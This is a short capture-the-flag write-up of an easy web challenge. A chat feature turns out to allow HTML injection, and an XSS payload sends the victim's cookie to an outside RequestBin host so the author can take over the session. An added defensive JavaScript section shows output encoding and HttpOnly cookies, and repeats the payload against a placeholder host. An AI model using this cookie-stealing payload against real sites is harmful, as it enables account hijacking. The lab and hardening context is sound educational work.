OnlyHacks.md
Category: #Web
Rated Difficulty: #VeryEasy
Personal Difficulty: #Medium

Made an account and logged in

Accepted all users

Got a message

Ran `<h1>Hi</h1>` in the chat and got big letters, vulnerable to [[HTML Injection]]

Checked for [[Cross-Site Scripting (XSS)]]

Found [RequestBin](https://requestbin.whapi.cloud/) in the writeup. Shows you all the requests it gets from the link it gave you

Ran `<script>document.location="http://requestbin.whapi.cloud/1hdcs8u1?"+document.cookie</script>`

Got the cookie and used it to log in. Found the flag in chat with another user
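
Defensive counterpart to the two findings above, as an added example that is not part of the original notes or the challenge's code: a chat renderer that output-encodes messages, next to the unsafe concatenation that produces the "big letters", and a session cookie marked `HttpOnly` so page script cannot read it. The function names, the cookie name `session` and the sample messages are constructed assumptions.

```javascript
// Added example: hypothetical chat rendering code, not the challenge's source.
const HTML_ESCAPES = {
  "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;",
};

// Encode every character that can start a tag, an entity or an attribute value.
function escapeHtml(text) {
  return String(text).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Vulnerable pattern: the message body is concatenated into markup as-is,
// so <h1> or <script> typed by one user becomes live markup for the other.
function renderMessageUnsafe(sender, body) {
  return `<div class="msg"><b>${sender}</b>: ${body}</div>`;
}

// Hardened: both fields are output-encoded for the HTML body context.
function renderMessageSafe(sender, body) {
  return `<div class="msg"><b>${escapeHtml(sender)}</b>: ${escapeHtml(body)}</div>`;
}

// Session cookie attributes: HttpOnly hides the value from document.cookie,
// Secure keeps it off plain HTTP, SameSite limits cross-site sends.
function sessionCookieHeader(name, value) {
  return `${name}=${encodeURIComponent(value)}; Path=/; HttpOnly; Secure; SameSite=Lax`;
}

// Check helper: names of all opening tags a browser would parse in `html`.
function liveTags(html) {
  return [...html.matchAll(/<([a-z][a-z0-9]*)/gi)].map((m) => m[1].toLowerCase());
}

// Constructed sample messages modelled on the two tests in the notes.
const SAMPLES = [
  "<h1>Hi</h1>",
  '<script>document.location="http://collector.example/?"+document.cookie</script>',
];

for (const body of SAMPLES) {
  console.log("unsafe:", liveTags(renderMessageUnsafe("bob", body)).join(","));
  console.log("safe:  ", liveTags(renderMessageSafe("bob", body)).join(","));
}
console.log("Set-Cookie:", sessionCookieHeader("session", "constructed-value"));
```

Encoding at output closes the injection itself; `HttpOnly` only limits what a missed injection can read, so both belong in the fix.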